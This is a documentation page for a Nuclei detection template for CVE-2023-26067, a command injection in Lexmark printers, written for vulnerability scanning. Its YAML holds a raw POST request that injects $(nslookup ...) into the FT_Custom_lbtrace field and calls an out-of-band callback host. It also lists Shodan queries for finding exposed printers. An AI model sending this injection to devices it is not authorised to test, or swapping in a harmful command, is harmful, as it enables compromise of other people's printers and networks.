Skip to content
Nuclei Templates

Lexmark Printers - Command Injection

ID: CVE-2023-26067

Severity: high

Author: DhiyaneshDK

Tags: cve2023,cve,printer,iot,lexmark

Description

Section titled “Description”

Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).

YAML Source

Section titled “YAML Source”
id: CVE-2023-26067


info:
  name: Lexmark Printers - Command Injection
  author: DhiyaneshDK
  severity: high
  description: |
    Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.
  remediation: |
    Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability.
  reference:
    - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/
    - https://github.com/horizon3ai/CVE-2023-26067
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26067
    - https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf
    - https://support.lexmark.com/alerts/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-26067
    cwe-id: CWE-20
    epss-score: 0.10331
    epss-percentile: 0.94831
    cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lexmark
    product: cxtpc_firmware
    shodan-query:
      - "Server: Lexmark_Web_Server"
      - "server: lexmark_web_server"
  tags: cve2023,cve,printer,iot,lexmark
variables:
  cmd: 'nslookup {{interactsh-url}}'


http:
  - raw:
      - |
        POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Length: 49


        FT_Custom_lbtrace=$({{cmd}})


    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(body, 'Fax Trace Settings')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100fe643869bee14d2d7e67a372384a708a9ec65fc593144e18ee8dc5106dbf8c8002204b1e5671279bf2f2e6f15f985da9ebb3bf52e2e10ad67002967d885e76fc9f20:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-26067.yaml"

View on Github